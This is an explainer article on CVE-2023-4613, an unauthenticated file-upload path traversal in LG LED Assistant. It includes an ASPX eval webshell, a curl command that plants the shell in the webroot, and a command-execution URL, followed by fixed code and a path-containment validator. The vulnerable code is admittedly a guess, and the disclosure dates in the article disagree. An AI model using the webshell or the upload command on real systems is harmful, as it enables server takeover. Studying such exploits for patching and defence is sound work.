CVE-2023-4613 - LG LED Assistant Remote Code Execution Exploit Explained

In June 2023, a critical security flaw was revealed in LG LED Assistant, making it possible for attackers on the Internet to run any code they like on affected computers—without even needing a password. This vulnerability, tracked as CVE-2023-4613, exists in a web API endpoint responsible for uploading files. Here we break down what the bug is, how it works, and demonstrate a proof-of-concept (PoC) exploit.

If you use LG LED Assistant, you should patch this immediately. This article is exclusive and written in simple language to help anyone understand the issue.

What is CVE-2023-4613?

CVE-2023-4613 is a remote code execution (RCE) vulnerability in the popular digital signage software, LG LED Assistant. The bug is found in the /api/settings/upload endpoint, which is accessible remotely without authentication. This means anyone can trigger the flaw—it doesn't matter if they have an account or not.

The problem? The endpoint does not validate user-supplied file paths before using them. That allows attackers to upload files anywhere on the server—possibly replacing program files or placing malicious code to be run later.

The vulnerable code likely looks something like this (simplified Python for illustration):

from flask import Flask, request

app = Flask(__name__)

@app.route("/api/settings/upload", methods=["POST"])
def upload():
    # Destination path is taken straight from the unauthenticated request
    filepath = request.form.get("path")
    filedata = request.files['file']
    # BAD: No validation on filepath
    filedata.save(filepath)
    return "Upload successful"

Here, the filepath parameter comes directly from the HTTP request, and if an attacker submits ../../../../../windows/system32/cmd.exe, it could overwrite critical files. Worse, placing a malicious file in a web-exposed folder can result in direct remote code execution.

Proof of Concept Exploit

The exploit is simple: upload a file (like a webshell) to a directory of your choice.

For a Windows server, the attacker could upload a simple ASPX webshell:

<%@ Page Language="JScript"%>
<%eval(Request["cmd"],"unsafe");%>

If the LG LED Assistant management server is running on http://victim:808:

curl -X POST -F 'path=../../webroot/shell.aspx' -F 'file=@shell.aspx' http://victim:808/api/settings/upload

By using ../, the attacker climbs up the folder hierarchy and drops shell.aspx into the webroot.

Now the attacker just needs to send commands to the new shell:

http://victim:808/shell.aspx?cmd=Response.Write("Hello from attacker!")

Real-World Impact

- Attackers can take full control of digital signs, upload ransomware, deface display boards, or use the server as a pivot point inside your company.

How to Fix

If you run LG LED Assistant, check the LG advisories or contact your support provider for a patched version. Until you patch, block access to port 808 (or the management port you configured) from untrusted networks.

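A proper fix in code would look like:

import os
from flask import Flask, request

app = Flask(__name__)

@app.route("/api/settings/upload", methods=["POST"])
def upload():
    filepath = request.form.get("path", "")
    # Only allow upload to safe upload directory
    safe_dir = "/opt/llg_led_assistant/uploads"
    # Keep only the final path component; treat "\" as a separator on any OS
    filename = os.path.basename(filepath.replace("\\", "/"))
    if filename in ("", ".", ".."):
        return "Invalid path", 400
    abs_path = os.path.abspath(os.path.join(safe_dir, filename))
    filedata = request.files['file']
    filedata.save(abs_path)
    return "Upload successful"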
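
The following is an added example, not LG's code and not part of the original article. It goes one step beyond the basename approach above with a containment check that resolves the requested path and refuses anything landing outside the upload root, then runs it against the two traversal paths quoted in this article. The function names, the extension allow-list, and the sample inputs other than those two paths are assumptions made for illustration.

```python
import os
import tempfile

ALLOWED_EXTENSIONS = {".png", ".jpg", ".cfg"}  # assumption: hypothetical allow-list

class UnsafeUploadPath(ValueError):
    """Raised when a client-supplied upload path must be refused."""

def resolve_upload_path(upload_root, requested):
    """Return an absolute path inside upload_root, or raise UnsafeUploadPath."""
    if not requested or "\x00" in requested:
        raise UnsafeUploadPath("empty path or NUL byte")
    # Treat "\" as a separator on every OS so "..\..\x" is caught on Linux too.
    normalised = requested.replace("\\", "/")
    if normalised.startswith("/") or normalised[1:2] == ":":
        raise UnsafeUploadPath("absolute path or drive letter")
    root = os.path.realpath(upload_root)
    # realpath collapses ".." and follows symlinks before the containment check.
    candidate = os.path.realpath(os.path.join(root, normalised))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        raise UnsafeUploadPath("escapes upload root")
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXTENSIONS:
        raise UnsafeUploadPath("extension not allowed")
    return candidate

def check_samples():
    """Run constructed sample paths (two are the article's payloads) through the check."""
    samples = [
        "logo.png",                                 # legitimate upload
        "../../webroot/shell.aspx",                 # payload from the article
        "../../../../../windows/system32/cmd.exe",  # path from the article
        "..\\..\\webroot\\shell.aspx",              # backslash variant
        "shell.aspx",                               # stays in root, script type
        "link/logo.png",                            # symlink that leaves the root
    ]
    results = {}
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "uploads")
        os.makedirs(root)
        os.symlink(os.path.join(base, "webroot"), os.path.join(root, "link"))
        for sample in samples:
            try:
                resolve_upload_path(root, sample)
                results[sample] = "accepted"
            except UnsafeUploadPath as err:
                results[sample] = str(err)
    return results

if __name__ == "__main__":
    print("\n".join(f"{v:30} {p}" for p, v in check_samples().items()))
```

Path validation alone does not address the missing authentication on the endpoint, so the network restriction described above still applies.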

Conclusion

CVE-2023-4613 is a dangerous security bug in LG LED Assistant that requires urgent attention from anyone who deploys LG digital signage. Exploiting it is easy and does not require a password. Patch as soon as possible and never expose these services to the public Internet.

Stay safe, keep your systems updated, and always validate user inputs!

Timeline

Published on: 09/04/2023 09:15:00 UTC
Last modified on: 09/08/2023 14:14:00 UTC